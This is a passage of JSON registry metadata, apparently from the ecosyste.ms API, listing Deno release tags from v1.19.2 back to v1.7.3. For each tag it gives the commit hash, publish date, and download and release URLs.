ithub.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":